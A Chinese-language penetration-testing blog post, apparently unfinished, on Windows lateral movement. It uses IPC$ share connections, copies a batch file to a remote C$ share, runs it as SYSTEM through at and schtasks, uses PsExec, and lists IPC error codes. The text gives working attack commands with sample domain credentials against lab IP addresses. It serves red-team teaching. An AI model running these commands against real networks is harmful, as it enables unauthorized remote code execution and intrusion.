关于横向移动之IPC+计划任务[未完待续]

0x01 前言

因为在

 IPC 利用条件

• 1、139 或 445 端口开启:ipc 连接可以实现远程登录及对默认共享的访问;而 139 端口 的开启表示 netbios 协议的应用，我们可以通过 139、445 端口实现对共享文件/打印机的访 问
• 2、管理员开启了默认共享:默认共享是为了方便管理员远程管理而默认开启的共享， 即所有的逻辑盘(C$、d$、e$…)和系统目录 winnt 或者 windows(admin$)

4.2.1.2 建立 IPC 连接、copy 文件、创建计划任务

net use \\192.168.19.169\c$ test@123 /user:adtest\jeff1 

copy 1.bat \\192.168.19.169\c$

net time \\192.168.19.169

at \\192.168.19.169 1:03 c:\1.bat

schtasks

由于 at 在新版本的系统中已被弃用，我们需要用 schtasks 替代

schtasks /create /s 192.168.19.177 /u adtest\jeff1 /p test@123 /ru "SYSTEM" /tn test /sc DAILY /tr c:\1.bat /F

创建计划任务，/s 指定远程机器名或 ip 地址，/ru 指定运行任务的用户权限，这里指定 为最高的 SYSTEM，/tn 是任务名称，/sc 是任务运行频率，这里指定为每天运行，并没什么 实际意义，/tr 指定运行的文件，/F 表示如果指定的任务已经存在，则强制创建任务并抑制警告

运行任务，其中/i 表示立即运行

schtasks /run /s 192.168.19.177 /u adtest\jeff1 /p test@123 /tn test /i

删除计划任务

schtasks /delete /s 192.168.19.177 /u adtest\jeff1 /p test@123 /tn test /f

4.2.1.3 IPC 常见错误

错误号 5，拒绝访问 : 很可能你使用的用户不是管理员权限的，先提升权限;
错误号 51，Windows 无法找到网络路径 : 网络有问题;
错误号 53，找不到网络路径 : ip 地址错误;目标未开机;目标 lanmanserver 服务未启动; 目标有防火墙(端口过滤);
错误号 67，找不到网络名 : 你的 lanmanworkstation 服务未启动;目标删除了 ipc$; 错 误号 1219，提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个 ipc$，请删除再 连。
错误号 1326，未知的用户名或错误密码:原因很明显了;
错误号 1792，试图登录，但是网络登录服务没有启动:目标 NetLogon 服务未启动。(连接 域控会出现此情况)
错误号 2242，此用户的密码已经过期:目标有帐号策略，强制定期要求更改密码。

4.2.1.4 PsTools

PsTools 是 sysinternals 开发的一个功能强大的安全管理工具包，最新版目前共有 13 个 各种功能的小工具。这里介绍下 psexec，psexec 是一款远程执行命令的工具，在内网渗透 的时候常它来进行横向移动。 下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

PsExec

1、 若已建立 IPC$连接，无需再次输入账号密码，所有 pstools 工具可直接使用 net use //查看 ipc 连接状态

2、 若未建立 IPC 连接，则要使用账号密码进行登录

PsExec.exe \\192.168.19.178 -u adtest\jeff1 -p test@123 cmd.exe

转载请注明：Adminxe's Blog » 密码保护：关于横向移动之IPC+计划任务[未完待续]